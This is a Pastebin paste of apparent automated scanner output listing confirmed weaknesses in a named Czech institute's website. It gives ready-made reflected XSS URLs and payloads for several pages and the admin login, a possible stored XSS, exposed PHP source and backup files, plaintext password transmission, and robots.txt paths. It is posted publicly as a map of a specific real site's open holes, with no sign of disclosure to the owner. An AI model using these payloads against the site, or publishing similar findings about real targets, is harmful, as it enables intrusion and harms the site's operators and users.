API tools faq
paste
Advertisement
sroub3k

libinst.cz

sroub3k
May 8th, 2012
227
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.07 KB | None | 0 0
raw download clone embed print report
  1. http://libinst.cz - LiberΓ‘lnΓ­ institut - XSS -
  2.  
  3. ||| XSS (Cross-site Scripting)
  4.  
  5. Severity: Important
  6. Confirmation: Confirmed
  7. Vulnerable URL: http://libinst.cz/komentare.php?centrum=5&typ=--><script>alert(9)</script>
  8. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  9. Parameter Name: typ
  10. Parameter Type: Querystring
  11. Attack Pattern: --><script>alert(9)</script>
  12.  
  13. Severity: Important
  14. Confirmation: Confirmed
  15. Vulnerable URL: http://libinst.cz/clanky.php?centrum=5&typ='><script>alert(9)</script>
  16. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  17. Parameter Name: typ
  18. Parameter Type: Querystring
  19. Attack Pattern: '><script>alert(9)</script>
  20.  
  21. Severity: Important
  22. Confirmation: Confirmed
  23. Vulnerable URL: http://libinst.cz/stranka.php?inc=email-send&adresa='"--></style></script><script>alert(0x0005C6)</script>&id=985
  24. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  25. Parameter Name: adresa
  26. Parameter Type: Querystring
  27. Attack Pattern: '"--></style></script><script>alert(0x0005C6)</script>
  28.  
  29. Severity: Important
  30. Confirmation: Confirmed
  31. Vulnerable URL: http://libinst.cz/stranka.php?inc=email-send&adresa=clanky.php&id='"--></style></script><script>alert(0x0005CB)</script>
  32. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  33. Parameter Name: id
  34. Parameter Type: Querystring
  35. Attack Pattern: '"--></style></script><script>alert(0x0005CB)</script>
  36.  
  37. Severity: Important
  38. Confirmation: Confirmed
  39. Vulnerable URL : http://libinst.cz/stranka.php?inc=multimedia
  40. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  41. Parameter Name: str
  42. Parameter Type: Post
  43. Attack Pattern: " stYle="x:expre/**/ssion(alert(9))
  44.  
  45. Severity: Important
  46. Confirmation: Confirmed
  47. Vulnerable URL: http://libinst.cz/admin/administrace.php?lang=en
  48. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  49. Parameter Name: user
  50. Parameter Type: Post
  51. Attack Pattern: '"--></style></script><script>alert(0x0008A2)</script>
  52.  
  53. Severity: Important
  54. Confirmation: Confirmed
  55. Vulnerable URL: http://libinst.cz/stranka_en.php?inc=multimedia_en
  56. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  57. Parameter Name: str
  58. Parameter Type: Post
  59. Attack Pattern: "><iframe onload=alert(9)>
  60.  
  61.  
  62. ||| [Possible] Permanent Cross-site Scripting
  63.  
  64. Severity: Important
  65. Confirmation: Confirmed
  66. Vulnerable URL: http://libinst.cz/admin/administrace.php
  67. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  68. Injection URL: http://libinst.cz/admin/administrace.php?lang=en
  69.  
  70. ||| [Possible] PHP Source Code Disclosure
  71.  
  72. Vulnerability Classifications: PCI 6.5.6 CAPEC-118 CWE-200 209
  73. Severity: Medium
  74. Confirmation: Confirmed
  75.  
  76. Vulnerable URL: http://libinst.cz/osobni/schwarz/
  77. Vulnerable URL: http://libinst.cz/osobni/sima/
  78. Vulnerable URL: http://libinst.cz/osobni/stastny/
  79. Vulnerable URL: http://libinst.cz/osobni/barak/
  80. Vulnerable URL: http://libinst.cz/osobni/pavlik/
  81. Vulnerable URL: http://libinst.cz/osobni/stefunko/
  82.  
  83. ||| Password Transmitted Over HTTP
  84.  
  85. Severity: Important
  86. Confirmation: Confirmed
  87. Vulnerable URL: http://libinst.cz/admin/administrace.php?lang=en&id=alter_stranka
  88. Vulnerability Classifications: PCI 6.5.9 OWASP A9 CWE-311 319
  89. Form target action: administrace.php?lang=en
  90.  
  91. ||| [Possible] Backup File Found
  92.  
  93. Vulnerability Classifications: PCI 6.5.10 OWASP A7 CAPEC-87 CWE-425
  94. Severity: Low
  95. Confirmation: Confirmed
  96.  
  97. Vulnerable URL: http://libinst.cz/novinky.php~
  98. Vulnerable URL: http://libinst.cz/rss.php~
  99. Vulnerable URL: http://libinst.cz/komentare.php~
  100. Vulnerable URL: http://libinst.cz/clanky.php~
  101. Vulnerable URL: http://libinst.cz/stranka.php~
  102.  
  103. ||| Robots.txt Identified
  104.  
  105. Severity: Information
  106. Confirmation: Confirmed
  107. Vulnerable URL : http://libinst.cz/robots.txt
  108. Interesting Robots.txt Entries:
  109.  
  110. Disallow: /data
  111. Disallow: /etexts
  112. Disallow: /jirka
  113. Disallow: /pictures
  114. Disallow: /pic
  115. Disallow: /temp
  116. Disallow: /tl
  117. Disallow: /zeleznice
  118. Disallow: /cesta
  119. Disallow: /admin
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!